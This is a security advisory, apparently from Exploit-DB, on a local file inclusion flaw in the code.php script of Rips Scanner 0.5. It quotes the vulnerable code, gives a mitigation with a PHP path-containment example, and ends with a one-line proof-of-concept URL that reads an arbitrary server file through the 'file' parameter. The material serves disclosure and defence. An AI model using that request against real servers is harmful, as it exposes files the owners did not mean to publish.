Vendor: Rips Scanner
By: Ashiyane Digital Security Team
CVSS: 9.3 (HIGH)
Vulnerability: Local File Inclusion
CWE: 22
Product Name: Rips Scanner
Affected Version From: 0.5
Affected Version To: 0.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Rips Scanner 0.5 – (code.php) Local File Inclusion

Rips Scanner 0.5 is vulnerable to Local File Inclusion. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'code.php' script. An attacker can exploit this vulnerability to include arbitrary files from the web server and execute arbitrary code in the context of the web server process. In the code quoted below, the only checks applied to 'file' are that it is non-empty, that it names an existing file, and that its extension is listed in $FILETYPES; the path is not restricted to any directory, and the file is read with file() and echoed back line by line.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. All user-supplied input should be validated and filtered before being used in the application.
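
One way to apply this mitigation to the check quoted in the advisory is to canonicalise the path with realpath() and require the result to sit under a fixed scan root. This is an added example, not RIPS code and not the advisory author's; the $FILETYPES values, the function names and the idea of a server-side scan root are assumptions, and the sample files are constructed in a temp directory.

```php
<?php
// Added example, not RIPS code. Assumed subset of RIPS's extension list:
$FILETYPES = ['.php', '.inc'];

// The check as quoted in the advisory: existence + extension only.
function original_check(string $file, array $types): bool {
    $ext = '.' . pathinfo($file, PATHINFO_EXTENSION);
    return !empty($file) && is_file($file) && in_array($ext, $types);
}

// Hardened (hypothetical helper): canonicalise, then require containment in $root.
function resolve_in_root(string $file, string $root, array $types): ?string {
    $rootReal = realpath($root);
    $real = realpath($file);          // resolves ../ and symlinks; false if missing
    if ($rootReal === false || $real === false || !is_file($real)) {
        return null;
    }
    $ext = '.' . strtolower(pathinfo($real, PATHINFO_EXTENSION));
    if (!in_array($ext, $types, true)) {
        return null;
    }
    // Trailing separator stops ".../scan-other" from matching root ".../scan"
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed sample layout: one file inside the scan root, two outside it.
$tmp = sys_get_temp_dir() . '/rips_demo_' . getmypid();
mkdir("$tmp/scan", 0700, true);
mkdir("$tmp/scan-other", 0700, true);
file_put_contents("$tmp/scan/app.php", "<?php echo 1;\n");
file_put_contents("$tmp/secret.php", "<?php // outside the scan root\n");
file_put_contents("$tmp/scan-other/x.php", "<?php\n");

// Columns: original check, hardened check, requested path (relative to $tmp)
foreach (["$tmp/scan/app.php", "$tmp/scan/../secret.php", "$tmp/scan-other/x.php"] as $p) {
    printf("%-6s %-6s %s\n",
        original_check($p, $FILETYPES) ? 'allow' : 'deny',
        resolve_in_root($p, "$tmp/scan", $FILETYPES) !== null ? 'allow' : 'deny',
        substr($p, strlen($tmp)));
}

// Remove the constructed files again.
array_map('unlink', ["$tmp/scan/app.php", "$tmp/secret.php", "$tmp/scan-other/x.php"]);
array_map('rmdir', ["$tmp/scan", "$tmp/scan-other", $tmp]);
```

The caller should pass the returned canonical path, not the original request value, to file(), so the path that was checked is the path that is read.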

Exploit-DB raw data:

================================================================================
# Rips Scanner 0.5 - (code.php) Local File Inclusion
================================================================================
# Vendor Homepage: https://github.com/robocoder/rips-scanner
# Date: 24/12/2015
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
# Version : 0.5
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt
================================================================================
# Vulnerable File : code.php

# Vulnerable Code:

	
// code.php, lines 102-125
$file = $_GET['file'];                        // user-controlled path, used as-is
$marklines = explode(',', $_GET['lines']);
$ext = '.'.pathinfo($file, PATHINFO_EXTENSION);

// only checks: non-empty, existing file, extension listed in $FILETYPES
if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
{
	$lines = file($file);

	// place line numbers in extra table for more elegant copy/paste without line numbers
	echo '<tr><td><table>';
	for($i=1, $max=count($lines); $i<=$max;$i++)
		echo "<tr><td class=\"linenrcolumn\"><span class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
	echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';

	$in_comment = false;
	for($i=0; $i<$max; $i++)
	{
		$in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
	}
} else
{
	echo '<tr><td>Invalid file specified.</td></tr>';
}


# PoC :

http://localhost/rips/windows/code.php?file=/var/www/html/index.php

Vulnerable Parameter : file

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================